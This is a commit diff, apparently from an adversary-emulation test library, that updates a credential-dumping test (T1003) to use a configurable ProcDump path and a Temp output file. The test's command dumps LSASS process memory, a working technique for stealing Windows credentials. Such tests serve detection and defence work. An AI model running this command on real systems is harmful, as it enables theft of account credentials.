Improve test 5 (ProcDump) for T1003 that performs Credential Dumping (#759)

This commit is contained in:
Mr B0b
2019-12-30 16:14:49 +01:00
committed by Carrie Roberts
parent 99a2a8aa31
commit d587dfbc91
+8 -2
View File
@@ -89,16 +89,22 @@ atomic_tests:
- windows
input_arguments:
procdump_binary_path:
description: Path of the ProcDump binary
type: string
default: $PathToAtomicsFolder\T1003\bin\procdump64.exe
output_file:
description: Path where resulting dump should be placed
type: Path
default: lsass_dump.dmp
default: C:\Windows\Temp\lsass_dump.dmp
executor:
elevation_required: true
name: command_prompt
command: |
procdump.exe -accepteula -ma lsass.exe #{output_file}
#{procdump_binary_path} -accepteula -ma lsass.exe #{output_file}
cleanup_command: |
rm "#{output_file}"
- name: Dump LSASS.exe Memory using Windows Task Manager
description: |